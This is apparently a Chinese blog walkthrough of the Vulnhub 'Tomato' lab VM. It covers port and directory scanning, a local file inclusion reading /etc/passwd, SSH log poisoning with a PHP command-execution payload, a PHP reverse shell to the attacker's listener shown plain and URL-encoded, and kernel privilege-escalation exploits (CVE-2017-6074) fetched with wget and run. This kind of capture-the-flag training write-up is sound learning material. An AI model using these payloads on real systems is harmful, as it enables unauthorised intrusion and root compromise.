靶机渗透记录"/>
Vulnhub Tomato靶机渗透记录
Vulnhub Tomato靶机渗透记录
环境配置
靶机镜像下载地址:
,557/
- Kali Linux IP:192.168.1.128
- Tomato IP: 192.168.1.140
信息收集
- 使用arp-scan -l 扫描本地局域网存活主机:
arp-scan -l
- nmap扫描开放端口以及相关信息:
nmap -A -p- 192.168.1.140
- 访问http服务端口查看页面信息:
- 没有相关可利用信息,继续访问8888端口http服务:
- 利用dirb对站点目录进行爆破:
dirb http://192.168.1.140
发现其他站点目录,尝试访问:
http://192.168.1.140/antibot_image/antibots/
根据修改时间发现info.php文件最新更新,访问并查看源码:
发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd:
http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../etc/passwd
漏洞利用
已知info.php文件存在文件包含漏洞,以及开放ssh端口,尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:
- 尝试用tomato作为用户名进行失败登录,观察相关日志记录:
- 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入:
<?php system($_GET['cmd']);?>
- 验证PHP代码是否注入成功:
访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=ls
并查看网页源代码:
- 尝试getshell,利用php反弹shell,Kali攻击机利用nc监听4444端口:
nc -lvp 4444
PHP反弹shell代码如下:
php -r '$sock=fsockopen("192.168.1.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url编码后得到:
php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
成功getshell:
权限提升
- 利用python打开一个终端:
python3 -c "import pty;pty.spawn('/bin/bash')"
2.查看内核版本:
uname -a
利用searchsploit搜索相应内核模块:
searchsploit 4.4.0-21
利用44300.c,netfilter模块的提权POC,使用命令:
searchsploit -m 44300
查看poc信息,将44300.c分成decr.c与pwn.c两个c文件分别编译:
gedit 44300.c
编译出错:
完整安装gcc:
sudo apt-get install gcc-multilib
分别编译,编译完成(警告先不管):
gcc decr.c -m64 -O2 -o decr
gcc pwn.c -m64 -O2 -o pwn
Kali攻击机后台启动Http服务器,上传文件:
python -m SimpleHTTPServer 8080 &
目标主机跳转到/tmp目录下,利用wget获取提权exp:
wget http://192.168.1.128:8080/decr
wget http://192.168.1.128:8080/pwn
赋予exp执行权限运行提权:
chmod +x decr && chmod +x pwn
./decr
./pwn
提权失败。。。。
网上搜索发现github上面有一个提权相关,Kali主机git项目:
git clone .git
运行compile.sh 编译c文件,并上传到目标主机,赋予执行权限,运行结果如下:
wget http://192.168.1.128:8080//linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/CVE-2017-6074
chmod +x CVE-2017-6074
./CVE-2017-6074
提权成功
但是可能是因为物理机电脑CPU不兼容,虚拟机报错:
不过也算渗透成功了。。。
更多推荐
Vulnhub Tomato靶机渗透记录
发布评论